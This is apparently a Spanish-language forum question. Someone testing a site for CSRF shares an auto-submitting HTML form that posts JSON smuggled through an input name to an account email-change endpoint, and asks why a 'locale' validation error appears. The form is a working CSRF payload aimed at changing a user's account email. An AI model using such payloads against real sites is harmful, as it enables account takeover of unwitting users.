Por lo tanto, estoy probando este sitio en busca de cursos y creo que podría ser CSRF vulnerable. Sin embargo, cuando intento realizar una solicitud posterior, recibo un error de validación que dice que se requiere "locale" a pesar de que lo especifique en la solicitud. Aquí está el código fuente del formulario.
<html>
<head>
</head>
<body>
<
<form action="http://account.testbank.com/api/account/v1/user/email" method="post" enctype='applicatiom/json'>
<input name='{"email":"[email protected]" ,"locale": "en"}'>
<input type="hidden" name="locale" id="locale" value="en-US">
<script> document.forms[0].submit()</script>
</form>
</body>
</html>
¿Qué estoy haciendo mal?